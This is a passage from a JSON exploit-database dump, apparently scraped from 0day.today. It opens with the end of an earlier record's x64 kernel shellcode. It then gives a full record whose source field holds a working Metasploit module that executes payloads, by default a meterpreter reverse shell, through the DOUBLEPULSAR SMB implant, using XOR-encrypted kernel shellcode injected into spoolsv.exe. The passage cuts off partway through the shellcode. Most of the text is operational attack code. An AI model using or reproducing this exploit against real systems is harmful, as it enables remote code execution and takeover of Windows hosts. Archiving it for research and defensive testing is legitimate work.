\"\\x56\\x41\\x55\\x41\\x54\\x53\\x55\\x48\\x89\\xE5\\x66\\x83\\xE4\\xF0\\x48\\x83\" +\r\n \"\\xEC\\x20\\x4C\\x8D\\x35\\xE3\\xFF\\xFF\\xFF\\x65\\x4C\\x8B\\x3C\\x25\\x38\\x00\" +\r\n \"\\x00\\x00\\x4D\\x8B\\x7F\\x04\\x49\\xC1\\xEF\\x0C\\x49\\xC1\\xE7\\x0C\\x49\\x81\" +\r\n \"\\xEF\\x00\\x10\\x00\\x00\\x49\\x8B\\x37\\x66\\x81\\xFE\\x4D\\x5A\\x75\\xEF\\x41\" +\r\n \"\\xBB\\x5C\\x72\\x11\\x62\\xE8\\x18\\x02\\x00\\x00\\x48\\x89\\xC6\\x48\\x81\\xC6\" +\r\n \"\\x08\\x03\\x00\\x00\\x41\\xBB\\x7A\\xBA\\xA3\\x30\\xE8\\x03\\x02\\x00\\x00\\x48\" +\r\n \"\\x89\\xF1\\x48\\x39\\xF0\\x77\\x11\\x48\\x8D\\x90\\x00\\x05\\x00\\x00\\x48\\x39\" +\r\n \"\\xF2\\x72\\x05\\x48\\x29\\xC6\\xEB\\x08\\x48\\x8B\\x36\\x48\\x39\\xCE\\x75\\xE2\" +\r\n \"\\x49\\x89\\xF4\\x31\\xDB\\x89\\xD9\\x83\\xC1\\x04\\x81\\xF9\\x00\\x00\\x01\\x00\" +\r\n \"\\x0F\\x8D\\x66\\x01\\x00\\x00\\x4C\\x89\\xF2\\x89\\xCB\\x41\\xBB\\x66\\x55\\xA2\" +\r\n \"\\x4B\\xE8\\xBC\\x01\\x00\\x00\\x85\\xC0\\x75\\xDB\\x49\\x8B\\x0E\\x41\\xBB\\xA3\" +\r\n \"\\x6F\\x72\\x2D\\xE8\\xAA\\x01\\x00\\x00\\x48\\x89\\xC6\\xE8\\x50\\x01\\x00\\x00\" +\r\n \"\\x41\\x81\\xF9\\xBF\\x77\\x1F\\xDD\\x75\\xBC\\x49\\x8B\\x1E\\x4D\\x8D\\x6E\\x10\" +\r\n \"\\x4C\\x89\\xEA\\x48\\x89\\xD9\\x41\\xBB\\xE5\\x24\\x11\\xDC\\xE8\\x81\\x01\\x00\" +\r\n \"\\x00\\x6A\\x40\\x68\\x00\\x10\\x00\\x00\\x4D\\x8D\\x4E\\x08\\x49\\xC7\\x01\\x00\" +\r\n \"\\x10\\x00\\x00\\x4D\\x31\\xC0\\x4C\\x89\\xF2\\x31\\xC9\\x48\\x89\\x0A\\x48\\xF7\" +\r\n \"\\xD1\\x41\\xBB\\x4B\\xCA\\x0A\\xEE\\x48\\x83\\xEC\\x20\\xE8\\x52\\x01\\x00\\x00\" +\r\n \"\\x85\\xC0\\x0F\\x85\\xC8\\x00\\x00\\x00\\x49\\x8B\\x3E\\x48\\x8D\\x35\\xE9\\x00\" +\r\n \"\\x00\\x00\\x31\\xC9\\x66\\x03\\x0D\\xD7\\x01\\x00\\x00\\x66\\x81\\xC1\\xF9\\x00\" +\r\n \"\\xF3\\xA4\\x48\\x89\\xDE\\x48\\x81\\xC6\\x08\\x03\\x00\\x00\\x48\\x89\\xF1\\x48\" +\r\n \"\\x8B\\x11\\x4C\\x29\\xE2\\x51\\x52\\x48\\x89\\xD1\\x48\\x83\\xEC\\x20\\x41\\xBB\" +\r\n \"\\x26\\x40\\x36\\x9D\\xE8\\x09\\x01\\x00\\x00\\x48\\x83\\xC4\\x20\\x5A\\x59\\x48\" +\r\n \"\\x85\\xC0\\x74\\x18\\x48\\x8B\\x80\\xC8\\x02\\x00\\x00\\x48\\x85\\xC0\\x74\\x0C\" +\r\n \"\\x48\\x83\\xC2\\x4C\\x8B\\x02\\x0F\\xBA\\xE0\\x05\\x72\\x05\\x48\\x8B\\x09\\xEB\" +\r\n \"\\xBE\\x48\\x83\\xEA\\x4C\\x49\\x89\\xD4\\x31\\xD2\\x80\\xC2\\x90\\x31\\xC9\\x41\" +\r\n \"\\xBB\\x26\\xAC\\x50\\x91\\xE8\\xC8\\x00\\x00\\x00\\x48\\x89\\xC1\\x4C\\x8D\\x89\" +\r\n \"\\x80\\x00\\x00\\x00\\x41\\xC6\\x01\\xC3\\x4C\\x89\\xE2\\x49\\x89\\xC4\\x4D\\x31\" +\r\n \"\\xC0\\x41\\x50\\x6A\\x01\\x49\\x8B\\x06\\x50\\x41\\x50\\x48\\x83\\xEC\\x20\\x41\" +\r\n \"\\xBB\\xAC\\xCE\\x55\\x4B\\xE8\\x98\\x00\\x00\\x00\\x31\\xD2\\x52\\x52\\x41\\x58\" +\r\n \"\\x41\\x59\\x4C\\x89\\xE1\\x41\\xBB\\x18\\x38\\x09\\x9E\\xE8\\x82\\x00\\x00\\x00\" +\r\n \"\\x4C\\x89\\xE9\\x41\\xBB\\x22\\xB7\\xB3\\x7D\\xE8\\x74\\x00\\x00\\x00\\x48\\x89\" +\r\n \"\\xD9\\x41\\xBB\\x0D\\xE2\\x4D\\x85\\xE8\\x66\\x00\\x00\\x00\\x48\\x89\\xEC\\x5D\" +\r\n \"\\x5B\\x41\\x5C\\x41\\x5D\\x41\\x5E\\x41\\x5F\\x5E\\xC3\\xE9\\xB5\\x00\\x00\\x00\" +\r\n \"\\x4D\\x31\\xC9\\x31\\xC0\\xAC\\x41\\xC1\\xC9\\x0D\\x3C\\x61\\x7C\\x02\\x2C\\x20\" +\r\n \"\\x41\\x01\\xC1\\x38\\xE0\\x75\\xEC\\xC3\\x31\\xD2\\x65\\x48\\x8B\\x52\\x60\\x48\" +\r\n \"\\x8B\\x52\\x18\\x48\\x8B\\x52\\x20\\x48\\x8B\\x12\\x48\\x8B\\x72\\x50\\x48\\x0F\" +\r\n \"\\xB7\\x4A\\x4A\\x45\\x31\\xC9\\x31\\xC0\\xAC\\x3C\\x61\\x7C\\x02\\x2C\\x20\\x41\" +\r\n \"\\xC1\\xC9\\x0D\\x41\\x01\\xC1\\xE2\\xEE\\x45\\x39\\xD9\\x75\\xDA\\x4C\\x8B\\x7A\" +\r\n \"\\x20\\xC3\\x4C\\x89\\xF8\\x41\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xC2\\x8B\" +\r\n \"\\x42\\x3C\\x48\\x01\\xD0\\x8B\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xD0\\x50\\x8B\" +\r\n \"\\x48\\x18\\x44\\x8B\\x40\\x20\\x49\\x01\\xD0\\x48\\xFF\\xC9\\x41\\x8B\\x34\\x88\" +\r\n \"\\x48\\x01\\xD6\\xE8\\x78\\xFF\\xFF\\xFF\\x45\\x39\\xD9\\x75\\xEC\\x58\\x44\\x8B\" +\r\n \"\\x40\\x24\\x49\\x01\\xD0\\x66\\x41\\x8B\\x0C\\x48\\x44\\x8B\\x40\\x1C\\x49\\x01\" +\r\n \"\\xD0\\x41\\x8B\\x04\\x88\\x48\\x01\\xD0\\x5E\\x59\\x5A\\x41\\x58\\x41\\x59\\x41\" +\r\n \"\\x5B\\x41\\x53\\xFF\\xE0\\x56\\x41\\x57\\x55\\x48\\x89\\xE5\\x48\\x83\\xEC\\x20\" +\r\n \"\\x41\\xBB\\xDA\\x16\\xAF\\x92\\xE8\\x4D\\xFF\\xFF\\xFF\\x31\\xC9\\x51\\x51\\x51\" +\r\n \"\\x51\\x41\\x59\\x4C\\x8D\\x05\\x1A\\x00\\x00\\x00\\x5A\\x48\\x83\\xEC\\x20\\x41\" +\r\n \"\\xBB\\x46\\x45\\x1B\\x22\\xE8\\x68\\xFF\\xFF\\xFF\\x48\\x89\\xEC\\x5D\\x41\\x5F\" +\r\n \"\\x5E\\xC3\"\r\n end\r\n\r\nend\n\n# 0day.today [2018-04-12] #", "_object_type": "robots.models.zdt.ZDTBulletin", "_object_types": ["robots.models.zdt.ZDTBulletin", "robots.models.base.Bulletin"]}, {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "f7b4a950dfa38196577777902e8186fb", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0147", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0144"], "immutableFields": [], "lastseen": "2021-11-18T10:01:02", "history": [{"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "17d700fd854b12d8236aeb17651589d3", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/33313", "reporter": "metasploit", "references": [], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2019-12-04T03:58:12", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:142603", "PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:156196"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27802", "1337DAY-ID-27803", "1337DAY-ID-27613"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:43970", "EDB-ID:47456"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "MS17-010.NASL", "SMB_NT_MS17-010.NASL"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0143", "CVE-2017-0145", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0146"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96707", "SMNTC-96705", "SMNTC-96706", "SMNTC-96709", "SMNTC-96704"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"]}, {"type": "threatpost", "idList": ["THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0148", "MS:CVE-2017-0145"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC", "MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:9EF85E0CE1D118D27911357B1C516074"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}], "modified": "2019-12-04T03:58:12", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2019-12-04T03:58:12", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n 